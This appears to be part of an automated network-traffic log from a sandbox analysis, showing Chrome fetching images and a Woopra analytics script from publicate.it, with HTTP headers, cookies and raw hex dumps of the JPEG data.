                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 0c 3b 1f 53 51 27 d0 60 17 5e 6b f1 ac 32 37 13 1d 14 93 3b b5 2c 87 dc bd 23 d1 56 59 ff 00 53 3f f6 d1 ff 00 b9 50 74 4d 96 8e 3f f7 39 1e 33 c7 fe e5 b1 4e 92 23 da 58 a7 55 9f 78 79 0f ca 72 c7 13 49 45 4b 0d fa c3 01 3c ca c5 a9 ca 8c 4e 61 63 50 5a 38 37 62 d8 ff 00 14 79 64 77 e1 60 7f d6 67 f1 55 6f 44 59 5a 7c fc 3d c3 c1 cc 3f ea 57 8b 11 1f ed 52 6f cc ff 00 b9 a3 cf 88 d4 cb 7c f9 e4 27 c5 61 3e 57 38 ed 71 2b a1 1e 89 32 a4 1d b8 4d 5b be 8b a2 1f 6b d5 3f 15 19 50 1b ff 00 87 eb 9e ef f9 88 5a 3f 78 ac 91 44 c7 4a 54 9a e2 7a d4 e7 4e 24 ab 4a e8 ae e8 b7 2b 9b e6 64 ac 8e fa 75 8c 3f 63 82 1e 8c f2 d8 01 a3 c9 58 9a 47 19 23 77 da f5 6e 5a fb 2b cf 47 f5 39 c1 da 77 ab d9 0c b2 7a 38 de ef a2 d2 57 43 1d 1d 74 88 db e8 f0 06 b2 fd 97 40 3f
                                                                                                                                                                                                        Data Ascii: ;SQ'`^k27;,#VYS?PtM?93N#XUxyrIEK<NacPZ87bydw`gUoDYZ|=?WRo|'a>W8q+2M[k?PZ?xDJTzN$J+du?cXG#wnZ+G9wz8WCt@?
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 24 dc c4 31 75 39 bb 23 9a 6a 73 76 47 35 95 af 45 c1 fc 93 5e 8b 83 f9 26 e6 21 8b a9 cd d9 1c d3 53 9b b2 39 ac ad 7a 2e 0f e4 9a f4 5c 1f c9 37 31 0c 5d 4e 6e c8 e6 9a 9c dd 91 cd 65 6b d1 70 7f 24 d7 a2 e0 fe 49 b9 88 62 ea 73 76 47 34 d4 e6 ec 8e 6b 2b 5e 8b 83 f9 26 bd 17 07 f2 4d cc 43 17 53 9b b2 39 a6 a7 37 64 73 59 5a f4 5c 1f c9 35 e8 b8 3f 92 6e 62 18 ba 9c dd 91 cd 4f 47 4c f8 a4 2f 7d 86 cb 00 0a bf 5e 8b 83 f9 29 20 a8 64 c4 86 93 71 d4 50 d9 32 22 28 58 44 44 10 cd e9 a3 f0 3e e5 2b 77 28 a6 f4 d1 f8 1f 72 95 bb 90 55 11 10 40 67 fe 5a 29 c3 6f f9 32 f7 3b 86 db 0e 7b 79 29 d5 8d 89 8d 95 d2 06 8c f7 00 09 ee 1b be d5 7a 99 c7 b2 23 3e e2 22 28 48 8a d7 3d ad f3 9c 07 89 57 03 71 70 50 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01
                                                                                                                                                                                                        Data Ascii: $1u9#jsvG5E^&!S9z.\71]Nnekp$IbsvG4k+^&MCS97dsYZ\5?nbOGL/}^) dqP2"(XDD>+w(rU@gZ)o2;{y)z#>"(H=WqpP


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        65192.168.2.5498165.9.73.804436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC1202OUTGET /track/ce/?project=publicate.it&instance=woopra&meta=&screen=1280x1024&language=en-US&app=js-client&referer=&cookie=sB4hScRiWkjO&event=pv&timeout=600000&idptnc=eNCnXL5OXflh&ce_campaign_name=powered_by_publicate&ce_campaign_medium=referral&ce_campaign_source=publicate_user_exported_emails&ce_url=%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_title=Publicate%20%7C%20HTML%20Email%20Template%20Builder&ce_domain=publicate.it&ce_uri=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_scroll%20depth=0.17704470037087644&ce_returning=false HTTP/1.1
                                                                                                                                                                                                        Host: www.woopra.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC270INHTTP/1.1 200 OK
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                        pragma: no-cache
                                                                                                                                                                                                        content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                        content-length: 67
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC67INData Raw: 69 66 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 2e 77 6f 6f 70 72 61 29 21 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 7b 0a 77 69 6e 64 6f 77 2e 77 6f 6f 70 72 61 2e 6c 61 62 65 6c 73 3d 7b 7d 3b 0a 7d 0a
                                                                                                                                                                                                        Data Ascii: if(typeof(window.woopra)!='undefined'){window.woopra.labels={};}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        66192.168.2.549830104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC879OUTGET /images/nhph3-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 18724
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "4924-620aa1d24ea10"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bm32j66u1JIkIPIZXtPELQFOKwg8JpBV%2F9qTvZB45z63Una0UgrGyOn4LQTvFuPMa%2BLKiF78D4kPN3KwPonmNFw053EVxEj3IlQNN0rzkdDCQBrhLUmJwVgK62cK%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b4b98243ad-EWR
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC621INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 75 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 ff c4 00 53 10 00 01 03 02 01 07 06 0a 08 03 05 06 05 04 03 00 01 00 02 03 04 11 05 06 12 13 21 31 51 91 14 41 52 61 71 d1 07 22 32 33 53 72 81 92 a1 b1 16 17 23 54 55 63 93 c1 08 15 42 62 73 a2
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((u"S!1QARaq"23Sr#TUcBbs
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: c8 c0 e1 1b 00 3b dc 7b 97 cc be 0d f2 ab 0c a8 c6 30 fa 9a bc ca 39 59 3b 4c a4 79 07 af ab e4 be 94 a4 20 d3 b0 82 08 37 20 8e d2 b9 d2 94 9b 6a 47 5c 44 21 1b 38 6c cb 9e 51 2f 42 3f 78 f7 27 28 97 a1 1f bc 7b 94 11 76 33 13 d3 cb d0 8f de 3d c9 a7 97 a1 1f bc 7b 94 10 ec 40 6a 39 45 e1 16 97 03 c4 9f 45 51 43 3c b2 35 e1 85 d1 b9 b6 bd af ce b6 e8 6a e4 96 18 e4 11 b0 07 b4 38 02 e3 ce 2f b9 70 af 09 e3 3b 2b 67 fe fc 7f d8 bb 7d 17 fb 95 3f f7 4c ff 00 b4 2e 54 e6 e4 da 66 8a b4 d4 23 16 bc 4b 9d 3c bd 08 fd e3 dc 9a 79 7a 11 fb c7 b9 45 78 ba 99 c9 e9 e5 e8 47 ef 1e e5 8f c7 71 b3 83 e1 92 d6 cf 06 92 38 c8 05 ac 76 b3 73 6e 75 7a b5 9f 08 e6 d9 25 55 d6 e6 7c d5 66 ed 16 d1 7a 6b 34 d2 65 ee 4d 65 53 31 f6 ca 69 a9 5d 10 88 34 9d 23 86 bb f6 2c e7
                                                                                                                                                                                                        Data Ascii: ;{09Y;Ly 7 jG\D!8lQ/B?x'({v3={@j9EEQC<5j8/p;+g}?L.Tf#K<yzExGq8vsnuz%U|fzk4eMeS1i]4#,
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: fe 00 ba 51 bb 77 65 71 36 50 71 48 ee 83 62 20 d8 8b 59 e7 84 44 40 11 11 00 44 44 01 11 10 1c 53 c2 d6 37 25 76 3a 70 e8 de 79 35 1d 81 68 d8 e9 08 d6 4f 66 ce 2b 44 59 3c a9 71 7e 52 e2 ae 71 b9 e5 32 6b ff 00 d4 56 31 7d 96 16 9a a7 46 31 5d 0f 88 c5 d4 75 6b 4a 4f a8 44 45 dc ce 67 b2 63 25 71 2c a3 32 3a 85 91 b2 18 ce 6b a6 95 d6 6d f7 0e 72 55 be 51 e4 f6 21 93 d5 4c 87 11 8d a0 3c 13 1c 8c 37 63 c0 db 63 bf a9 74 5f 04 d9 41 87 43 82 bb 0d aa 9e 2a 7a 98 e4 73 c6 91 c1 a2 40 ed 77 04 f3 8d 96 58 df 0b d8 f5 06 20 da 3a 0a 19 a3 a8 92 17 99 24 92 33 9c d6 ea b0 6d f9 cf 72 f3 23 8a ae f1 4e 93 8f 77 f3 53 d5 96 12 82 c2 2a aa 5d ef cd 0e 6c b6 ec 2b c1 f6 37 89 61 cd ac 63 60 85 8f 6e 74 6c 99 e5 ae 78 e6 36 b6 ab f5 ad 45 7d 0b 82 65 4e 0f 5d 84
                                                                                                                                                                                                        Data Ascii: Qweq6PqHb YD@DDS7%v:py5hOf+DY<q~Rq2kV1}F1]ukJODEgc%q,2:kmrUQ!L<7cct_AC*zs@wX :$3mr#NwS*]l+7ac`ntlx6E}eN]
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 43 72 7b f0 9a 6e 07 bd 39 bd 3f 2b 1c 9a af 99 1c 05 17 7e fa 1b 93 df 84 d3 70 3d e9 f4 37 27 bf 09 a6 e0 7b d3 9b d3 f2 bf b0 e4 d5 7c c8 e0 28 bb f7 d0 dc 9e fc 26 9b 81 ef 4f a1 b9 3d f8 4d 37 03 de 9c de 9f 95 fd 87 26 ab e6 47 01 45 df be 86 e4 f7 e1 34 dc 0f 7a 7d 0d c9 ef c2 69 b8 1e f4 e6 f4 fc af ec 39 35 5f 32 38 0a 2e fd f4 37 27 bf 09 a6 e0 7b d3 e8 6e 4f 7e 13 4d c0 f7 a7 37 a7 e5 7f 61 c9 aa f9 91 c0 51 77 ef a1 b9 3d f8 4d 37 03 de 9f 43 72 7b f0 9a 6e 07 bd 39 bd 3f 2b fb 0e 4d 57 cc 8e 02 8b bf 7d 0d c9 ef c2 69 b8 1e f4 fa 1b 93 df 84 d3 70 3d e9 cd e9 f9 5f d8 72 6a be 64 70 15 ec 43 ed e2 f5 db f3 0b be fd 0d c9 ef c2 69 b8 1e f5 07 64 7e 4f b4 82 dc 26 98 10 41 06 c7 bd 43 ed 7a 6d 7d 2c 95 d8 d5 53 fa 91 f1 77 85 3a b2 ec a2 9e 9e
                                                                                                                                                                                                        Data Ascii: Cr{n9?+~p=7'{|(&O=M7&GE4z}i95_28.7'{nO~M7aQw=M7Cr{n9?+MW}ip=_rjdpCid~O&ACzm},Sw:
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 0e 55 67 36 c7 96 c4 2d ff 00 f1 e3 59 d2 dc e6 91 bc 59 76 5b 19 db d4 d7 eb b1 ac 36 81 f0 8a 98 e0 66 95 c1 ad 27 37 59 3d 8a ce af 2b 30 a8 26 96 27 d3 b9 c6 31 77 9d 1b 40 1c 6d db d8 b3 cc c2 a9 58 f0 5b a4 0e 1a ec 24 3f 25 af 62 3e 0f 30 4c 41 d7 aa 6d 53 8e df 16 50 0f 1b 5d 44 af fe 25 e1 93 fc 8c bc f5 98 64 0c 63 a7 8d 8c 25 8d 7d b4 37 b0 70 b8 d8 15 2a 16 08 72 b7 27 dc f6 c0 d9 a5 86 ac 38 c2 dc d6 bb c5 61 16 be bd 8a 8e 27 0e 4f c4 e8 63 c4 aa 61 6b e9 a3 6b 1a 24 a8 73 5c 00 1a af 62 2f a9 46 af 32 a3 29 f2 4e 5a 37 36 68 1e 2a 83 1c c7 67 02 d3 06 a2 0f 38 d4 ac d6 85 56 e6 f3 5e 46 8c 0d 47 5a c6 8a 58 33 73 84 63 38 92 4a 9b a9 65 3f f2 8a 0a 69 03 4f d9 39 72 6a e7 43 92 56 65 88 c8 dc 86 c6 27 84 8e 5f 57 54 e8 69 41 fe 9b 37 c6 7f
                                                                                                                                                                                                        Data Ascii: Ug6-YYv[6f'7Y=+0&'1w@mX[$?%b>0LAmSP]D%dc%}7p*r'8a'Ocakk$s\b/F2)NZ76h*g8V^FGZX3sc8Je?iO9rjCVe'_WTiA7
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: fc c4 7e a8 53 40 11 11 00 44 44 01 11 10 14 ea 00 31 39 df d4 d1 9c 0e e2 aa 0d 8a 13 f9 89 3d 53 f2 53 1b 02 03 c7 1c d6 92 76 01 75 18 99 ab 39 da de 76 9d dd 49 37 99 7f aa 54 c6 c0 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 0a 94 fe 41 ec 55 55 29 fc 83 d8 80 e7 95 d4 82 9a 67 55 53 b4 37 38 de 56 8e 7f ed 76 ac 66 52 b4 d6 41 4d 44 d3 7e 53 23 73 80 e8 83 73 f2 5b 43 da 0d c1 17 07 99 61 a0 a2 d1 d5 c8 e9 4e 73 9a 2d 1f f6 58 b8 49 7f 8f 53 44 25 6e f7 42 e1 83 34 0b 70 50 8d 80 17 b8 0d ae ba ac 6d 65 e0 b5 ac ae d1 cd 32 74 e0 18 99 fd 92 42 ab 6b 9d 4a ca 8e 76 b6 a6 78 1e 4d c5 9e d1 bc 15 77 24 97 60 b6 ab f3 21 3e 25 39 dd 9b 66 b3 da 52 39 a3 8e 10 e9 21 12 1b ed 26 c4 2f 25 1b 7b 15 86 25 23 a3 c3 a7 73 1d 9a e6 ec 2b 9c 9d
                                                                                                                                                                                                        Data Ascii: ~S@DD19=SSvu9vI7T""" """ AUU)gUS78VvfRAMD~S#ss[CaNs-XISD%nB4pPme2tBkJvxMw$`!>%9fR9!&/%{%#s+
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 95 5f ce 5a 5b 0e 8f c4 fb 46 3e e6 ff 00 d9 68 3b 14 54 8a 84 5a 47 5a 52 73 92 6c c5 12 5d 51 21 1b 33 96 e7 82 02 cc 2e 10 2d ac 13 ac ef 2b 49 ac ab a4 c3 68 a7 ae c4 67 8e 9e 96 21 9c f9 64 36 0d 1f fc e6 5c da af c3 cc 34 f5 0f 8b 0e a5 a8 9e 99 ae 2d 63 de c6 32 e3 9a c2 f7 e2 b2 60 e2 dd d9 b3 19 25 64 8e d9 97 18 24 99 45 92 d8 96 17 1b 98 d9 66 8b ec dc 4e a0 f0 6e df 88 5f 12 e2 d4 d3 d0 e2 15 14 b5 91 3a 2a a8 5e 59 2c 6e d4 5a e1 a8 85 df 30 ef 0e b4 53 10 2a 9b 2d 31 3c ef a6 0f 6f 16 bf f6 58 0c bf c9 d6 f8 41 90 e3 99 2c 22 a9 c4 33 6d 3b 29 9b aa 7b 6c 24 07 1b 3b b7 6a de b4 dd 98 3e ad 91 c4 dc ed b6 d8 a9 48 fd 57 be b5 94 c4 f2 77 1b c3 62 96 4a fc 23 10 a6 8e 23 9a f7 cb 4e e6 b5 a7 ac da cb 08 2e f7 75 29 5a 95 b5 b7 2a c2 2f ac ed
                                                                                                                                                                                                        Data Ascii: _Z[F>h;TZGZRsl]Q!3.-+Ihg!d6\4-c2`%d$EfNn_:*^Y,nZ0S*-1<oXA,"3m;){l$;j>HWwbJ##N.u)Z*/
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 31 69 04 1f 68 58 4c 46 7a fc 67 11 9a be be 2b d4 cc 6e f3 15 38 89 a7 ff 00 4b 40 03 82 fd 20 e4 cd e8 8e 09 c9 9b d1 1c 14 5d 22 5a 6f 76 7e 6e 47 45 50 f7 b6 38 69 a7 92 47 1b 06 b6 27 12 4f 55 82 fb 2f f8 63 c9 0c 47 25 32 1e 77 63 30 ba 9e af 11 a9 e5 3a 07 8b 3a 36 06 86 b7 38 73 13 62 6d cd 70 ba cb 69 c0 20 86 80 7b 15 cc 6c cd 46 c2 8d 8a 83 62 22 28 2c 11 11 00 44 44 01 11 10 04 44 40 59 c3 e6 99 d8 a6 a1 0f 9a 67 62 9a b9 42 70 f9 5e c5 59 51 87 ca f6 2a ca ac b2 08 88 a0 92 14 fe 62 3f 54 2c 3e 5a e1 d5 18 b6 4c d7 50 d1 86 9a 89 5a d0 c0 e7 66 8d 4e 07 6f b1 66 29 fc c4 7e a8 53 56 84 9c 24 a4 bc 0a ce 0a 71 71 7b 33 46 af c8 f9 f1 0c 8f c2 29 0c ad a7 c5 b0 f8 da 62 90 1b b4 38 0d 62 e3 9b 50 d7 d4 15 8d 76 1d 96 f8 e5 20 c3 31 13 43 4b 48
                                                                                                                                                                                                        Data Ascii: 1ihXLFzg+n8K@ ]"Zov~nGEP8iG'OU/cG%2wc0::68sbmpi {lFb"(,DDD@YgbBp^YQ*b?T,>ZLPZfNof)~SV$qq{3F)b8bPv 1CKH
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: d6 2a 6a 10 ec 7f ac 54 d7 13 b8 51 97 c8 2a 4a 32 f9 05 10 65 04 44 57 28 19 e7 d9 d8 7f 65 72 ad 99 e7 d9 d8 7f 65 72 aa f7 2c b6 08 88 a0 90 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 2c e1 f3 4c ec 53 50 87 cd 33 b1 4d 5c a1 38 7c af 62 ac a8 c3 e5 7b 15 65 56 59 04 44 50 49 45 8d 32 b4 3d ee 77 8d ac 00 48 00 29 68 5b bd fe f9 ef 4a 7f 31 1f aa 15 44 05 3d 0b 77 bf df 3d e9 a1 6e f7 fb e7 bd 54 44 05 3d 0b 77 bf df 3d e9 a1 6e f7 fb e7 bd 54 44 05 3d 0b 77 bf df 3d e9 a1 6e f7 fb e7 bd 54 44 05 19 1a 62 69 7b 1c ed 5a c8 24 90 42 ac a1 3f 98 93 d5 3f 25 31 b0 20 21 37 99 7f aa 54 c6 c0 a1 37 99 7f aa 54 c6 c0 80 21 36 51 91 ed 8d 8e 7b cd 9a d1 72 56 b1 8a e2 a5 ed 7b e4 93 45 4e de 62 7e 6b a5 3a 6e 6e c8 e7 52 a2 a6 ae cc e5 46 29 47 03 f3 64
                                                                                                                                                                                                        Data Ascii: *jTQ*J2eDW(erer," """ ,LSP3M\8|b{eVYDPIE2=wH)h[J1D=w=nTD=w=nTD=w=nTDbi{Z$B??%1 !7T7T!6Q{rV{ENb~k:nnRF)Gd
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 49 43 1e d6 d8 f3 85 7a a8 c5 4d 14 6e ce 68 37 de 4a ac a0 94 11 11 09 21 0e c7 fa c5 4d 42 1d 8f f5 8a 9a 00 a3 2f 90 54 94 65 f2 0a 20 ca 08 88 ae 50 33 cf b3 b0 fe ca e5 5b 33 cf b3 b0 fe ca e5 55 ee 59 6c 11 11 41 21 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 59 c3 e6 99 d8 a6 a1 0f 9a 67 62 9a b9 42 70 f9 5e c5 59 51 87 ca f6 2a ca ac b2 08 88 a0 92 14 fe 62 3f 54 29 a8 53 f9 88 fd 50 a6 50 18 fa ec 67 0d a0 98 45 5b 5f 4b 04 a7 63 24 94 34 f0 57 b1 c8 c9 23 6b e3 7b 5e c7 0b 87 34 dc 11 bc 15 cd 71 cc 27 27 b2 6d d5 55 39 48 66 c4 ea f1 07 3d f1 b9 d1 9b 8b 6d 00 83 61 b4 6b 55 72 5b 0e c4 4f 82 da c8 23 99 ac 9a 76 c8 f8 3e d4 59 8c 36 d5 9d b0 5e ce ec bf 32 db 2c 34 32 29 c6 5e 29 5d ad 1f ed fb 18 23 8a 9f 11 c2 51 5b 37 64 f5 5f bf ee 6e
                                                                                                                                                                                                        Data Ascii: ICzMnh7J!MB/Te P3[3UYlA!D@DDD@YgbBp^YQ*b?T)SPPgE[_Kc$4W#k{^4q''mU9Hf=makUr[O#v>Y6^2,42)^)]#Q[7d_n


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        67192.168.2.549831104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC922OUTGET /images/nhph4-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC746INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 23952
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "5d90-620aa1d1f9aaa"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xwQJHxwv2oL8eGFVdIpMzO87UVA55l2VW4bbM0BjGD%2Bnr3RWgLPu0cZRYSg4C8AwgLP7poDl9dNaGiRoqSFUsxQwwyPBF0fx%2FECULa3AfKQGihuin60JFjZmT6QxRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b4fd232394-EWR
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC623INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 c1 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 07 08 09 ff c4 00 4f 10 00 01 03 02 01 04 0d 08 08 04 04 05 05 01 01 00 01 00 02 03 04 11 05 06 12 21 31 13 14 16 32 41 51 52 55 61 71 92 93 d1 07 22 53 54 81 91 a1 b1 15 33 35 42 43 74 94 a2 23 73 b2 c1
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("O!12AQRUaq"ST35BCt#s
